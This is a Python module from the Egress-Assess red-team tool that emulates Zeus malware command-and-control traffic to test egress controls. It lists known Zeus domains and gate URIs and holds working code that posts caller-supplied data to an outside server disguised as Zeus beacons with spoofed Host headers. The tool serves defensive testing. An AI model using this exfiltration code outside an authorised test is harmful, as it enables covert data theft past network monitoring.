infosecn1nja
/
Egress-Assess
mirror of https://github.com/infosecn1nja/Egress-Assess.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Egress-Assess/commandcontrol/malware/zeus.py

280 lines
15 KiB
Python
Raw Permalink Blame History

'''
This module generates Zeus traffic.
Resources:
https://zeustracker.abuse.ch/blocklist.php
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/zeus.profile
'''
import random
import sys
import urllib
import urllib2
class Actor:
def __init__(self, cli_object):
self.cli = "zeus"
self.description = "Zeus Malware"
self.type = "malware"
self.server_requirement = "http"
self.egress_server = cli_object.ip
self.domains = [
'0x.x.gg', '6pjddrtt7.com', 'apexholdngs.com', 'baoshlda.com',
'bestdove.in.ua', 'championbft.com', 'codedtunes.zapto.org',
'cooldomainname.ws', 'danislenefc.info', 'dau43vt5wtrd.tk',
'diosdelared.com.mx', 'emaillifecoaching.com.au', 'emekonline.tk',
'eresimgbo.com', 'escoesco.info', 'fileserver03.com',
'finsolutions.top', 'fronty2073.net', 'genmjob3.ru',
'gjiayimeiya.com', 'gorainbowzone.tk', 'hope-found-now.net',
'hruner.com', 'hui-ain-apparel.tk', 'ice.ip64.net',
'interglobalswiss.info', 'jomo.in.ua', 'juyteche.tk',
'kesikelyaf.com', 'legitvendors.ru', 'lion.web2.0campus.net',
'liveresellerweb.eu', 'mccc-investconsultant.com' 'muazymaur.tk',
'mymytonnymaxltd.org', 'mypic.hopto.org', 'mystartap.com',
'neease.com', 'ns513726.ip-192-99-148.net',
'panel.vargakragard.se', 'polyaire-au.com',
'projects.globaltronics.net', 'regame.su', 'richus.ru',
'server.bovine-mena.com', 'ssl.sinergycosmetics.com',
'sslsam.com', 'sus.nieuwmoer.info', 'tesab.org.uk',
'up.frigo2000.it', 'update.odeen.eu', 'update.rifugiopontese.it',
'urchilaa.com', 'winscoft.com', 'www.nikey.cn',
'www.riverwalktrader.co.za', 'www.witkey.com', 'zabava-bel.ru']
self.post_data = [
{'zeus_id': 'uid=0(root) gid=0(root) groups=0(root)'},
{'zeus_whoami': 'root'}, {'zeus_dir': 'C:\\, C:\\Windows'},
{'zeus_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'},
{'zeus_ipconfig': '192.168.1.15 255.255.255.0 192.168.1.1'},
{'zeus_ping': 'google.com time=13.6, 15.1, 19.8, 20'}]
self.uris = [
'/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin',
'/jm32/includes/site/gate.php', '/mathew/config.jpg',
'/docs/.docs/config.jpg', '/docs/.docs/do.php',
'/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe',
'/zeujuus/a/modules/config.bin',
'/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php',
'/zejius/2HZG41Zw/bot.exe',
'/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin',
'/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php',
'/zejius/5GPR0iy9/bot.exe',
'/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg',
'/past/gate.php', '/fan/base/config.jpg',
'/wp-includes/pomo/panel/config.jpg',
'/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg',
'/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php',
'/home/plugins/system/tmp/bot.scr',
'/home/plugins/system/tmp/config.bin',
'/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg',
'/js/ssj/gate.php', '/site/tmp/xml/config.jpg',
'/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php',
'/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban',
'/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg',
'/vs/panel/gate.php', '/brand/server/file.php',
'/brand/server/gate.php',
'/wp-admin/css/colors/sunrise/admin/bot.exe',
'/wp-admin/css/colors/sunrise/admin/config.bin',
'/wp-admin/css/colors/sunrise/admin/secure.php',
'/wp-content/themes/chagim/library/images/plates/bot.exe',
'/wp-content/themes/chagim/library/images/plates/config.bin',
'/wp-content/themes/chagim/library/images/plates/gate.php',
'/images/burr_insurance001001.php', '/images/team/config.jpg',
'/images/team/gate.php', '/test/config.jpg', '/test/gate.php',
'/ray/server/file.php', '/ray/server/gate.php', '/capa.bin',
'/capa.exe', '/secure.php', '/ral/30/config.bin',
'/ral/30/secure.php', '/wp-admin/css/config.bin',
'/wp-admin/css/gate.php', '/wp-admin/css/setup.exe',
'/panel/config.jpg', '/panel/gate.php',
'/wp-includes2/SimplePie/Net/page/config.jpg',
'/wp-includes2/SimplePie/Net/page/gate.php',
'/includes/.srv/srv/bot.exe',
'/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php',
'/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin',
'/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg',
'/images2/gate.php', '/wp-includes/ID3/config.jpg',
'/wp-includes/ID3/gate.php', '/emman/panel/config.jpg',
'/emman/panel/gate.php', '/xampp/img/escu.bin',
'/xampp/img/escu.exe', '/xampp/img/secure.php',
'/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin',
'/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe',
'/isai/modules/mod_upgrade/config.bin',
'/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg',
'/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php',
'/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php',
'/img/vg.php', '/components/com_file/file.php',
'/components/com_file/gate.php', '/images/panel/config.jpg',
'/images/panel/gate.php', '/wordpress/gate.php',
'/wordpress/gree.jpg', '/media/.tmp/file.php',
'/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin',
'/modules/holl.exe', '/templates/admin/install/config.jpg',
'/templates/admin/install/gate.php',
'/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php',
'/tmp/cp/config.jpg', '/tmp/cp/gate.php',
'/tmp/install/config.jpg', '/tmp/install/gate.php',
'/frank/panel/config.jpg', '/frank/panel/gate.php',
'/tmp/configs/new/vg.php', '/meask/lite/file.php',
'/meask/lite/gate.php', '/css/src/admin/config.jpg',
'/css/src/admin/gate.php', '/js/admin/install/config.jpg',
'/js/admin/install/gate.php',
'/wp-content/plugins/wp-db-backup-made/work.php',
'/update/bot.exe', '/update/cfg.bin', '/update/gate.php',
'/chopinschumann/ital.bin', '/chopinschumann/ital.exe',
'/chopinschumann/secure.php', '/images/ital.bin',
'/images/ital.exe', '/images/secure.php',
'/compose/panel/bot.exe', '/compose/panel/config.bin',
'/compose/panel/secure.php', '/fy97/panel/config.bin',
'/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe',
'/images/secure.php', '/components/com_joomla/plugin/config.jpg',
'/components/com_joomla/plugin/gate.php',
'/resource/css/config.bin', '/resource/css/secure.php',
'/wp-content/upgrade/PANEL/config.jpg',
'/wp-content/upgrade/PANEL/gate.php',
'/wp-content/plugins/bcet56aoikqf52iu/food.php',
'/Scripts/_notes/build/bot.exe',
'/Scripts/_notes/build/config.bin',
'/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe',
'/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php',
'/KINS/panel/bot.exe', '/KINS/panel/config.jpg',
'/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php',
'/walex/files/bot.exe', '/walex/files/config.jpg',
'/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin',
'/e7/gate.php',
'/wp-admin/css/colors/coffee/cat/server/config.jpg',
'/wp-admin/css/colors/coffee/cat/server/gate.php',
'/site/S/13897652/5112/file.php',
'/site/S/13897652/5112/gate.php',
'/images/js/osomo/panel/config.jpg',
'/images/js/osomo/panel/gate.php',
'/themes/panel/config.jp', '/themes/panel/gate.php',
'/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php',
'/wqwcqqw/sasasacw.php', '/images/server/file.php',
'/images/server/gate.php', '/cache/lcitorg/config.bin',
'/cache/lcitorg/gate.php', '/form/panel/config.jpg',
'/form/panel/gate.php', '/backup/gate.php',
'/backup/jera.jpg', '/images/file.php',
'/images/js/panel/config.jpg', '/images/js/panel/gate.php',
'/images/config.jpg', '/images/gate.php',
'/slim-cita/helps/file.php', '/slim-cita/helps/gate.php',
'/kin/panelz/config.jpg', '/kin/panelz/gate.php',
'/image/Panel/config.jpg', '/folder/config.bin',
'/folder/secure.php', '/plugins/panel/config.jpg',
'/plugins/panel/gate.php',
'/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php',
'/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php',
'/js/MOM/config.jpg', '/js/MOM/gate.php',
'/lung/panel/config.jpg', '/wp/config.jpg',
'/wp/gate.php', '/data/config.jpg', '/data/gate.php',
'/templates/beez/bot.exe', '/templates/beez/config.bin',
'/templates/beez/gate.php', '/wp-includes/css/new/config.jpg',
'/wp-includes/css/new/gate.php',
'/language/pdf_fonts/server/bot.exe',
'/language/pdf_fonts/server/config.bin',
'/language/pdf_fonts/server/gate.php', '/js/liscence.php',
'/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php',
'/Mix/valeg/bot.exe', '/Mix/valeg/config.bin',
'/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php',
'/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg',
'/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg',
'/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php',
'/admin/b7.php', '/admin/file.php', '/amed/config.jpg',
'/amed/gate.php', '/sadcxvbv/vdfbffddf.php',
'/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php',
'/percy/panel/config.jpg', '/percy/panel/gate.php',
'/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png',
'/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg',
'/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg',
'/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg',
'/news/secure.php', '/news/vuan.bin', '/.id/file.php',
'/.id/gate.php',
'/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php',
'/overopen/panel/config.bin', '/overopen/panel/secure.php',
'/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php',
'/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php',
'/wp-comment/baba.jpg', '/wp-comment/gate.php',
'/alumno309/images/base.bin', '/alumno309/images/base.exe',
'/alumno309/images/secure.php',
'/wp-content/plugins/wp-db-backup-made/das.db',
'/ta_images/tools.php', '/plank/panel/config.jpg',
'/includes/database/http/config.jpg',
'/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php',
'/administrator/modules/mod_menu/help/config.jpg',
'/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin',
'/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe',
'/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php',
'/forum.php', '/config.php', '/wp-blog/gate.php',
'/wp-blog/mell.jpg', '/descargas/adm/gate.php',
'/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php',
'/images/outl.jpg', '/images/smilies/raye.jpg',
'/images/kin/config.jpg', '/jaextmanager_data/rimm.bin',
'/jaextmanager_data/secure.php', '/js/cssme/file.php',
'/js/cssme/thread.php', '/mss/plugins/system/config.bin',
'/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin',
'/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot',
'/images/secure.php', '/images/todo.bin', '/images/todo.exe',
'/plugins/system/bot.exe', '/plugins/system/config.bin',
'/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php',
'/modules/mod_footer/tmpl/gate.php', '/modules/secure.php',
'/modules/warp.bin', '/modules/warp.exe', '/file.php',
'/gate.php', '/db1/config.jpg', '/db1/gate.php',
'/katolog/thumbs/panel/config.jpg',
'/katolog/thumbs/panel/gate.php']
def emulate(self, data_to_exfil=None):
# headers that are used in get requests
zeus_headers = {
"Accept": "*/*",
"Connection": "Close",
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Pragma": "no-cache"
}
# Iterate over get and post request 5 times
for times_requested in xrange(1, 6):
selected_domain = random.choice(self.domains)
zeus_headers['Host'] = selected_domain
first_uri = random.choice(self.uris)
get_request = urllib2.Request(
"http://" + self.egress_server + first_uri,
headers=zeus_headers)
try:
urllib2.urlopen(get_request)
except urllib2.URLError:
print "[*] Error: Cannot connect to zeus data exfil server!"
print "[*] Error: Possible firewall, or proxy prventing this?"
sys.exit(1)
select_post_uri = False
while not select_post_uri:
post_uri = random.choice(self.uris)
if post_uri.endswith('.exe'):
pass
else:
select_post_uri = True
# Determining which data is being sent out by agent
if data_to_exfil is None:
posted_data = random.choice(self.post_data)
else:
posted_data = {'zeus_data': data_to_exfil}
# UrlEncode and send the data out
posted_data = urllib.urlencode(posted_data)
post_req = urllib2.Request(
"http://" + self.egress_server + post_uri, posted_data,
headers=zeus_headers)
try:
urllib2.urlopen(post_req)
except urllib2.URLError:
print "[*] Error: Cannot connect to putter zeus exfil server!"
print "[*] Error: Possible firewall, or proxy prventing this?"
sys.exit(1)
print "[*] INFO: Zeus C2 comms complete!"
return
Reference in New Issue View Git Blame Copy Permalink